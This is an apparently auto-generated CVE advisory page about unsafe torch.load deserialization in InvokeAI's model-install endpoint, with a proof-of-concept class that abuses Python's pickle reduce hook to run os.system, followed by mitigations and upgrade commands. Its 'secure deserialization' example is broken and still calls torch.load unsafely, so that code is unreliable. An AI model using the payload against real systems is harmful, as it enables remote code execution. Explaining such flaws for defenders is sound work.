InvokeAI, Deserialization of Untrusted Data, CVE-2025-XXXX (Critical)

By /

How the CVE Works:

The vulnerability in InvokeAI (CVE-2025-XXXX) stems from the unsafe deserialization of untrusted data in versions 5.3.1 through 5.4.2. The `/api/v2/models/install` API endpoint uses `torch.load` to deserialize model files without proper validation. Attackers can craft malicious model files containing arbitrary code, which is executed upon deserialization. This allows remote code execution (RCE) on the target system. The issue is resolved in version 5.4.3 by implementing proper validation and secure deserialization practices.

DailyCVE Form:

Platform: InvokeAI
Version: 5.3.1 – 5.4.2
Vulnerability: Remote Code Execution
Severity: Critical
Date: Mar 21, 2025

What Undercode Say:

Exploitation:

  1. Crafting Malicious Payload: Attackers can create a malicious model file using PyTorch’s serialization (torch.save) to embed arbitrary code. 
    import torch
import os
class Malicious:
def <strong>reduce</strong>(self):
return (os.system, ('echo "Exploited!"',))
payload = Malicious()
torch.save(payload, 'malicious_model.pt')
  2. Delivering Payload: The malicious file is uploaded to the target system via the `/api/v2/models/install` endpoint.
  3. Triggering Exploit: When the model is loaded using torch.load, the embedded code is executed.

Protection:

  1. Update: Upgrade to InvokeAI version 5.4.3 or later.
  2. Input Validation: Validate and sanitize all model files before deserialization.
  3. Sandboxing: Use a sandboxed environment to load and execute untrusted models.
  4. Monitoring: Monitor API endpoints for unusual activity or unexpected file uploads.

Commands:

  • Check Version: Verify the installed version of InvokeAI. 
    invokeai --version
  • Upgrade: Update to the patched version. 
    pip install --upgrade invokeai

Code Example for Secure Deserialization:

import torch
import pickle
def safe_load_model(file_path):
with open(file_path, 'rb') as f:
data = f.read()
Validate file signature or metadata
if not is_trusted(data):
raise ValueError("Untrusted model file")
return torch.load(file_path)

Analytics:

  • Impact: Critical (RCE)
  • Attack Vector: Remote
  • Complexity: Low
  • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

References:

References:

Reported By: https://github.com/advisories/GHSA-mcrp-whpw-jp68
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top